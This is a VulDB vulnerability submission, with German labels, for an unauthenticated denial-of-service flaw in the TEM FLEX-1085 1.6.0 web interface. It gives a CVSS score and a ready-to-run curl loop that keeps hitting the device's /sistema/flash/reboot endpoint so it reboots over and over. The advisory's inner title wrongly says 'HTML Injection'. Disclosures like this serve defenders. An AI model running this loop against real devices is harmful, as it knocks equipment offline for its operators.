| Titel | FLEX-1085 Web Denial of Service |
|---|
| Beschreibung | # Exploit Title: FLEX-1085 Web Denial of Service
# Date: 30/07/2022
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Linux
Title:
================
FLEX 1085 Web - HTML Injection
Summary:
================
A vulnerability, which was classified as problematic, was found in TEM FLEX-1085 1.6.0. Affected is an unknown function. The issue was identified as Denial of Service, allowing an unauthenticated malicious user to leave the device idle.
Severity Level:
================
7.5 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Affected Product:
================
FLEX 1085 Web v1.6.0
Steps to Reproduce:
================
1. Run this command in your terminal:
TARGET=http://target.com;while true;do curl -s $TARGET/sistema/flash/reboot > /dev/null;sleep 1;done |
|---|
| Quelle | ⚠️ https://www.tem.ind.br/?page=prod-detalhe&id=94&sid=0 |
|---|
| Benutzer | mrempy (UID 24379) |
|---|
| Einreichung | 31.07.2022 02:23 (vor 4 Jahren) |
|---|
| Moderieren | 31.07.2022 09:16 (7 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 205344 [TEM FLEX-1085 1.6.0 /sistema/flash/reboot Denial of Service] |
|---|
| Punkte | 17 |
|---|